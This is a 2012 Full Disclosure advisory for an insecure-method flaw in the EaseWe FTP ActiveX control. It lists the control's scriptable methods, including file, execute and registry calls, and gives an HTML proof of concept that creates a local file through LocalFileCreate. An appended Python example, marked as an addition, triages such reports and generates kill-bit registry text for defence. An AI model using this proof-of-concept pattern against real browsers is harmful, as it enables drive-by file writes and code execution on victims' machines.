Full Disclosure mailing list archives

Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit


From: kaveh ghaemmaghami <kavehghaemmaghami () googlemail com>
Date: Wed, 8 Aug 2012 06:06:54 -0700

Exploit Title: Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit
Date: 2012-08-08
Author: coolkaveh
coolkaveh () rocketmail com
Https://twitter.com/coolkaveh
Vendor Homepage: http://www.ftpocx.com/download.htm
Version: 4.6.02
Tested on: Windows 7
Awesome Hesam BOF
==========================================================================
Class FtpLibrary
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}
Number of Interfaces: 1
Default Interface: _FtpLibrary
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Interface _FtpLibrary : IDispatch
Default Interface: True
Members : 161
        QueueAppend
        QueueRemove
        FormatSize
        FormatFileSize
        FormatTime
        SFDFileName
        SFDFilter
        SFDInitialDir
        SFDTitle
        ShowBrowseFolderDialog
        ShowSaveFileDialog
        ServerName
        Username
        Password
        Port
        RemotePort
        RemotePath
        LocalPath
        ReplaceIndex
        ReplaceSetting
        RenameRule
        Percent
        MKDInfo
        MaxSpeed
        Rcvbuf
        Sndbuf
        Timeout
        RedoTimes
        AllowType
        DenyType
        MaxSize
        Title
        Encoding
        TranstatePath
        KeepAliveCommand
        KeepAliveInterval
        ListCommand
        ListSuffix
        LangInfo
        Info
        SInfo
        Lype
        ExistFile
        GetFileSize
        GetFtpFileSize
        GetFileInfo
        GetFtpFileInfo
        GetFileList
        GetFtpDirectoryInfo
        ExistDirectory
        CreateDirectory
        RemoveDirectory
        DeleteFile
        RenameFile
        SendCommand
        SetCurrentDirectory
        GetFileName
        GetFileNameWithoutExt
        GetFileExtension
        GetParentPath
        LocalFileExists
        LocalFolderExists
        LocalFileCreate
        LocalFolderCreate
        LocalFileDelete
        LocalFileRead
        LocalFileWrite
        GetLocalFileSize
        GetLocalFolderSize
        GetLocalFileCount
        GetLocalFileDate
        GetLocalFileList
        ShowCmd
        Execute
        Explore
        GetDriveNames
        ProxyHost
        ProxyPort
        RegCreate
        RegSetValue
        RegSetValueEx
        RegDelete
        RegDeleteValue
        RegDeleteValueEx
        RegGetValue
        RegGetValueEx
        RegExists
============================================================================
<HTML>
Easewe FTP(EaseWeFtp.ocx) Insecure Method Exploit<br>
<br>
Description: There is an insecure method in the (LocalFileCreate) function<br>
Found By : coolkaveh<br>

<title>Exploited By : coolkaveh </title>
<BODY>
 <object id=cyber
classid="clsid:{31AE647D-11D1-4E6A-BE2D-90157640019A}"></object>

<SCRIPT>

function Do_it()
 {
     File = "kaveh.txt"
   cyber.LocalFileCreate(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Click here To Test"><br>
</body>
</HTML>
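
An added example, not part of the original message: a defender-side triage of a report in the layout quoted above, which flags a control marked safe for scripting with no kill bit, lists members whose names suggest local file, process or registry side effects, and builds the .reg text that sets the kill bit for the CLSID. The function names and the member-name patterns are assumptions made for this example.

```python
import re

# Constructed sample in the layout of the report quoted above (member list shortened).
SAMPLE_REPORT = """\
GUID: {31AE647D-11D1-4E6A-BE2D-90157640019A}
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Members : 161
        FormatSize
        LocalFileCreate
        Execute
        RegSetValue
"""
# Assumption: name patterns hinting at file, process or registry side effects.
SENSITIVE = re.compile(r"^(LocalFile|LocalFolder|Reg)|^(Execute|Explore|ShowCmd)$")
KILLBIT_KEYS = (  # native and 32-bit registry views
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility",
    r"HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility",
)

def parse_report(text):
    """Extract CLSID, True/False flags and member names from the report text."""
    info = {"clsid": None, "flags": {}, "members": []}
    for line in text.splitlines():
        if m := re.match(r"\s*GUID:\s*(\{[0-9A-Fa-f-]{36}\})", line):
            info["clsid"] = m.group(1).upper()
        elif m := re.match(r"\s*(.+?):\s*(True|False)\s*$", line):
            info["flags"][re.sub(r"\W", "", m.group(1)).lower()] = m.group(2) == "True"
        elif line[:1].isspace() and line.strip().isidentifier():
            info["members"].append(line.strip())
    return info

def triage(info):
    """exposed = scriptable from a web page (safe for script, no kill bit)."""
    flags = info["flags"]
    exposed = flags.get("regkeysafeforscript", False) and not flags.get("killbitset", False)
    return exposed, [m for m in info["members"] if SENSITIVE.search(m)]

def killbit_reg(clsid):
    """Build .reg text setting Compatibility Flags 0x400 (the kill bit) for the CLSID."""
    out = ["Windows Registry Editor Version 5.00", ""]
    for key in KILLBIT_KEYS:
        out += [f"[{key}\\{clsid}]", '"Compatibility Flags"=dword:00000400', ""]
    return "\r\n".join(out)

if __name__ == "__main__":
    rep = parse_report(SAMPLE_REPORT)
    print(triage(rep), killbit_reg(rep["clsid"]), sep="\n")
```

Setting the kill bit stops Internet Explorer from instantiating the control at all, so confirm that no internal page depends on it before deploying the .reg file.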
